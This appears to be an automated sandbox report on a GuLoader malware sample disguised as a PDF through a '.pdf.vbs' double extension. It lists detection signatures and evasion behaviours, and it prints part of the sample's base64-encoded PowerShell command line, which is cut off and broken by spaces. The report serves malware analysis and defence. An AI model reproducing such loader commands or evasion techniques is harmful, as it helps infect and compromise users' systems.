Edit tour
Windows
Analysis Report
doc_65398086_4190362045539.pdf.vbs
Overview
General Information
Detection
GuLoader
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
C2 URLs / IPs found in malware configuration
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Classification
- System is w10x64
- wscript.exe (PID: 7096 cmdline:
C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\doc_6 5398086_41 9036204553 9.pdf.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - powershell.exe (PID: 5504 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe" - EncodedCom mand "IwBJ AG4AcwB0AH IAdQA5ACAA UwBCAEUAVQ BSAFQARQBS AE4ARQAgAF MAbABhAG4A IABTAHAAbw BuAHQAYQBu ADcAIABVAE 4AQwBBAEwA TAAgAGUAbQ BiAG8AIABy AGUAaQB0AC AAVABhAHIA cABhAHAAZQ AgAHUAZwBp AGYAdABlAH MAZAAgAEIA QQBDAEsAUw BUAEEASQBS ACAAZQBnAG 8AaQB0AHkA aAAgAFMAbQ BlAGQAIABV AFIATwBHAE UATgAgAHYA YQBzAG8Acg ByAGgAYQBw ACAAQQBtAG UAdAByAG8A IABQAEEAUg BBAFAASABS AEEAUwBUAC AASwByAHkA bQBtAGUAbA BsAG8AYwAy ACAASQBOAF QARQBSAFMA UABJAFIAIA BVAG4AcwBx AHUAZQA2AC AAagBhAGMA bwBiAGkAdA BpAHMAIABQ AEgATwBOAE 8AUABIACAA QQBiAHMAYw BvAG4AZABl AHIAcwA3AC AAQwBoAGkA awBpAHQAYQ BvAHAAcwAg AFMASwBZAE cARwAgAEQA TwBNAE0ARQ BEAEEARwBT ACAAbgBvAG 4AYQBzAHMA aQBzAHQAYQ AgAEEAcgBj AGgAYwBoAG UAIAB0AHYA aQB2ACAASw BhAHAAcgBp AGYAbwBsAG kAIABGAGkA bgBhAG4Acw B0AGkAIAAN AAoAIwBUAH IAaQBwAHAA ZQB0AHMAIA BNAGwAawBl ADIAIABuAG 8AbgBlAHgA cABsAG8Acg AgAEYATwBM AEsARQBDAE UAIABBAHIA dgBlAGYAbA BnAGUAIABG AEEAUwBUAF AAUgBJAFMA UwBZACAASA BvAGcAZwB3 ADYAIABSAG UAcABlAHQA NAAgAEgAQQ BMAFYATwBO AEsATABFAC AAQQByAGIA ZQBqAGQAcw AgAFAATABP AFQAVABFAF IAIABUAHMA ZQBkACAADQ AKACMARAB5 AG4AYQBtAG kAawBrAGUA bgA3ACAAUw BUAEsAWQBT AFQAVAAgAE gAeQBkAHIA bwBuAGkAdA A1ACAAcgBl AGQAaQBzAH QAcgBpACAA bQBlAHIAaQ BjAGEAcgAg AHYAaQBwAH AAIABGAGEA YgByADEAIA BGAEwATwBW AE0AQQAgAE EAQQBOAEQA UwBIAE8AIA BTAHQAYQBh AGwAcwB0AH UAIABKAEUA UwBVAEkAIA BUAGEAbgBh ACAAQwBvAG 0AbQBvACAA RwB1AGEAcA BpAG4AbwAg AFMAeQBuAG sAcgBvAG4A NwAgAGQAZQ B2AGwAaQBu AHIAZQB0AC AATwBtAHMA dABuAGkAbg BnAHMAZwAg AFIAZQBzAG UAMgAgAG0A ZQB0AHIAbw BsAG8AIABT AFUARwBFAE 4ARQBLAEQA QgBPACAAUw B2AGkAcgBw AGUAdABzAH UAbQAxACAA aAB5AGQAcg BhAHQAZQBy ACAATwBCAF MARQBSAFYA QQAgAFQARQ BNAFAAQQBO AEEAIABWAE kASwBJAE4A RwBFAFIAIA B1AHAAcgBp AHYAZQBlAG sAcwAgAGgA ZQBhAHIAdA BiACAARQBt AGIAZQBkAC AAVQBOAEEA UwBTAEUATg AgAE8AUABL AEwAQQAgAG UAZQBiAHIA ZQBlAHIAZQ AgAFAAaQBj AHIAaQB0AG kAYwAzACAA DQAKACMARQ BFAEwASQBF AFMAVAAgAE MAcgB5AHMA dABhAGwAbw BnADEAIABE AFUAUwBJAE 4ATQBFACAA SQBuAGQAaQ B2ADgAIAB1 AGQAcwBrAH IAaQBmAHQA cwBwACAAVA BlAGsAbgBv AGsAcgBhAD EAIAB0AHkA bgBkAHQAZg AgAEUAbABl AHYAdABpAG 0AZQA2ACAA ZAB5AGsAcw B2ACAAYgBv AG4AYgBvAG 4AZQByAHMA IABhAG4AdA BpAGMAYQBw AGkAdAAgAH UAbgBkAGUA cgAgAHYAaQ BlAHIAIABZ AEQARQBSAF AAIABLAGwA YgBlAGIAYQ BhAG4AZAA5 ACAAVgBpAH AAcwB0ADQA IABNAGEAeA BpAG0AbwBu ACAAQQBwAH AAcgBhAGkA cwBlADQAIA BBAFIAVABJ AEcARQBSAC AADQAKACMA VQBEAFMASw BSAEkARABO ACAAegBpAH QAYQBzACAA cwBwAGEAbg BrACAAVABp AHAAcABlAH IAaABvADYA IABzAGMAcg BvAGwAIABG AG4AaQBzAH IAIABGAFIA QQBTAEkARw BFACAAZABp AGUAdABpAG MAaQBhACAA aABhAGEAbg AgAFMAcABh AGEAbQBuAG QAcwAxACAA cwBlAHIAdg BpACAATABl AGQAcwBhAG cAZQBtAHUA IABVAG4AZA BlAHIAawBl AG4AZAB0AD cAIABTAGEA bgBkAHAANA